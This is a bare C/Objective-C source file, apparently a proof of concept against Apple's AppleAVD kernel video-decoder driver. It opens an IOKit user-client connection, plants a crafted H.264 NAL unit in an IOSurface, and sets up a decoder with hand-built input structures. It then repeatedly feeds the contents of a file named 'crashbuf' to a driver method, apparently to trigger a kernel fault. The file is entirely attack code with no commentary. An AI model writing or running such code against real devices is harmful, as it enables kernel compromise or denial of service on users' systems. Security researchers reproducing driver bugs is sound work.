#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>
#include <IOSurface/IOSurface.h>

#include <Foundation/Foundation.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>

void pthread_func(void** msg);
unsigned int selector = 0;

uint64_t inputScalar[16];
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];
size_t inputStructCnt = 16; 

uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};
size_t outputStructCnt = 4;

void null_sub(){}

struct async_reference {
  mach_port_t port;
  void(*fptr)(void);
  void* something;
  };

int main(int argc, char** argv){

	IOSurfaceRef r = IOSurfaceCreate(@{@"IOSurfaceAllocSize" :  @(128)});
	
	int b = IOSurfaceGetAllocSize(r);

	printf("%x\n", b);
	


  	kern_return_t err;


  	int** ptr= inputStruct;
  	ptr[0] = 0x77777777;
  	ptr[1] = rand();
  	ptr[2] = rand();
  	ptr[3] = rand();


  	CFMutableDictionaryRef matching = IOServiceMatching("AppleAVD");
  	if(!matching){
   		printf("unable to create service matching dictionary\n");
   	return 0;
  	}

	io_iterator_t iterator;
	err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
	if (err != KERN_SUCCESS){
		printf("no matches\n");
		return 0;
	}

	io_service_t service = IOIteratorNext(iterator);

	if (service == IO_OBJECT_NULL){
		printf("unable to find service\n");
   		return 0;
   	}
   	
   	
   	
	printf("got service: %x\n", service);

	io_connect_t conn = MACH_PORT_NULL;
  
	int stype = 0x100 | 1 | 16;
  
	err = IOServiceOpen(service, mach_task_self(), stype, &conn);
	if (err != KERN_SUCCESS){
		printf("unable to get user client connection\n");
		return 0;
	}

	printf("got userclient connection: %x\n", conn);
  	IONotificationPortRef npr = IONotificationPortCreate(kIOMasterPortDefault);
	mach_port_t np = IONotificationPortGetMachPort(npr);
  
	struct async_reference ar = {0};
	ar.port = npr;
	ar.fptr = null_sub;


 	char* addr = IOSurfaceGetBaseAddress(r);

	char nalu[] = { 0, 0, 0, 7, 0x68, 0xe8, 0x43, 0x82, 0xd2, 0xc8, 0xb0, 0, 0, 0, 32, 0x67, 0x64, 0x0, 0x33, 0xac, 0x72, 0x84, 0x40, 0x78, 0x2, 0x27, 0xe5, 0xc0, 0x44, 0x0, 0x0, 0x3, 0x0, 0x4, 0x0, 0x0, 0x3, 0x0, 0xf0, 0x3c, 0x60, 0xc6, 0x11, 0x80, 0x1, 0x0, 0x7};



	for(int i = 0; i < sizeof(nalu); i++){
		addr[i] = nalu[i];
	}
  
  
	IOConnectCallAsyncMethod( //setCallback
	      conn,
	      8,
	      np,
	      0,
	      0,
	      inputScalar,
	      inputScalarCnt,
	      inputStruct,
	      inputStructCnt,
	      outputScalar,
	      &outputScalarCnt,
	      outputStruct,
	      &outputStructCnt);


	char inp[] = {0x80, 0x07, 0x00, 0x00, 0xa0, 0x05, 0x00, 0x00, 0x4e, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
		0xff, 0x01, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
		0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 

	inp[0xb8] = IOSurfaceGetID(r);
  
  	size_t out_num = 0x60;

	IOConnectCallMethod( // createDecoder
		conn,
		0,
		inputScalar,
      		inputScalarCnt,
      		inp,
      		0xd8,
      		outputScalar,
      		&outputScalarCnt,
      		outputStruct,
      		&out_num);


	IOSurfaceRef r1 = IOSurfaceCreate(@{@"IOSurfaceAllocSize" :  @(50000), @"IOSurfacePixelFormat" : @(0x61766331), @"IOSurfaceCacheMode" : @(1024) });

	IOSurfaceSetValue(r1, @"IOSurfaceName", @"AVD video decoder RVRA");

	char id = IOSurfaceGetID(r1);

	int ids[16];

	ids[0] = 128;
	ids[1] = 0;
	ids[2] = id;


	void* ptrs[3];

	ptrs[0] = conn;
	ptrs[1] = id;
	ptrs[2] = np;


	IOConnectCallMethod( // mapPixelBuffer
      			conn,
      			3,
      			inputScalar,
      			inputScalarCnt,
      			ids,
      			16,
      			outputScalar,
      			&outputScalarCnt,
      			outputStruct,
      			&outputStructCnt);
      		
      		
      	
      	char* fb = malloc(0x880);
     	while(true){  
      	

      	
      	
      	FILE* pFile;
	char* yourFilePath  = "./crashbuf";
	pFile = fopen(yourFilePath,"rb");
	fread(fb, 1, 0x880, pFile);
	fclose(pFile);
	sync();
      	
      	void* fbo = malloc(0xe78);
      		
      		size_t fbl=0xe78;
      		
      		
      		
      		
      		
     
      	IOConnectCallMethod( 
      			conn,
      			2,
      			inputScalar,
      			inputScalarCnt,
      			fb,
      			0x880,
      			outputScalar,
      			&outputScalarCnt,
      			fbo,
      			&fbl);	
      			

	}
	IOServiceClose(conn);

	return 0;
}



